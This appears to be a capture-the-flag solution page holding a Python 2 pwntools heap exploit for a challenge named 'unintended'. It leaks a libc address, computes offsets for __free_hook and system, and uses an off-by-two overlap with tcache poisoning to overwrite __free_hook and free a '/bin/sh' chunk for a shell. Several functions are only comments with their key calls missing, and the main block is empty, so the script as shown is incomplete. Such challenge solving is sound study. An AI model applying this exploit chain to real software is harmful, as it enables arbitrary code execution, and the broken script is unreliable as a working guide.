Tags: pwn heap 

Rating: 1.5

#dont judge my python2 :)
from pwn import *

# p= process('./unintended')
p =remote('',52018)

# pid = gdb.attach(p,gdbscript='''
#   b * menu
#   ''')

#Helper functions
def make_challenge(index,category,name,desc_len,desc,points):

    p.sendlineafter('> ','1')
    p.sendlineafter('number: ',str(index))
    p.sendlineafter('category: ',category)
    p.sendlineafter('name: ',name)
    p.sendlineafter('length: ',str(desc_len))
    p.sendlineafter('description: ',desc)
    p.sendlineafter('Points: ',str(points))

def patch_challenge(index,desc):

    p.sendlineafter('> ','2')
    p.sendlineafter('number: ',str(index))
    p.sendafter('description: ',desc)

def deploy_challenge(index):

    p.sendlineafter('> ','3')
    p.sendlineafter('number: ',str(index))

def take_down_challenge(index):

    p.sendlineafter('> ','4')
    p.sendlineafter('number: ',str(index))

def leak(): 

    #Target for leak

    #Holder for top chunk not to consolidate

    #Free target

    #Put the same chunk on the same place but only overwrite 8 bytes of fp to get printf to printout bp's address

    #View the leak

    #Parse the leak
    leak = u64(p.recv(6).ljust(8,'\0'))

    print hex(leak)
    return leak

def code_redirect(where,what):

    #Target for off by 2 attack fill it up with data so we can attack strlen later

    #Target for overlapping chunk attack 

    #Holder not to consolidate with top chunk

    #Free target for overlap to put it in unsorted bin to trigger consolidation

    #Put half the size chunk in the same address as [2] and fill it up to overwrite bk and fp so there is no nullbytes
    #Important for strlen

    #Strlen will return size+2 (2 for the size in the header of the blob in unsorted bin since there are no \0 in body)
    #We use that to overwrite the size of this free chunk to make it larger(we will use that to overwrite freed chunks later)
    patch_challenge(2,'\0'*0x3e8 + '\xff\x05')

    #We allocate the descrption chunk large enough to get unsorted bin blob pointing just above [3] so next time we allocate a chunk we will be
    #Able to overwrite [3] fd pointer to redirect code
    #We also set the name of the chunk to /bin/sh\0 to free it later when we overwrite free_hook
    make_challenge(4,'/bin/sh\0','after',0x380,'D'*50,100) #B1
    #Free the chunk to get it into Tcache bin, we will now allocate another chunk and overwrite this chunks fd pointer and trigger a chain reaction
    #That leads to forcing malloc to return arbitrary pointer
    #Allocate another chunk that overlaps with [3], now we are able to overwrite [3] fd pointer with whatever we want, i chose __free_hook
    #We malloc 2 more chunks and in the second one will be allocated onto _free_hook, so we write there
    #Remember the chunk before whos name we set to /bin/sh\0 ? well this is how we get a shell, we free that chunk after having overwritten
    #__free_hook with system

def exploit():
    libc_leak = leak()
    libc_base = libc_leak -0x3ebc0a
    free_hook = libc_base +0x0000000003ed8e8

    one_gadget = libc_base +0x10a41c
    one_gadget1 = libc_base +0x4f432

    one_gadget2 = libc_base +0x4f3d5
    system = libc_base +0x00000000004f550
    print 'libc base: ',hex(libc_base)
    print 'free hook: ',hex(free_hook)
    print 'one gadget: ',hex(one_gadget2)
    print 'system: ',hex(system)

    #we will write addr of system on __free_hook
    code_redirect(free_hook, system)

if __name__ == '__main__':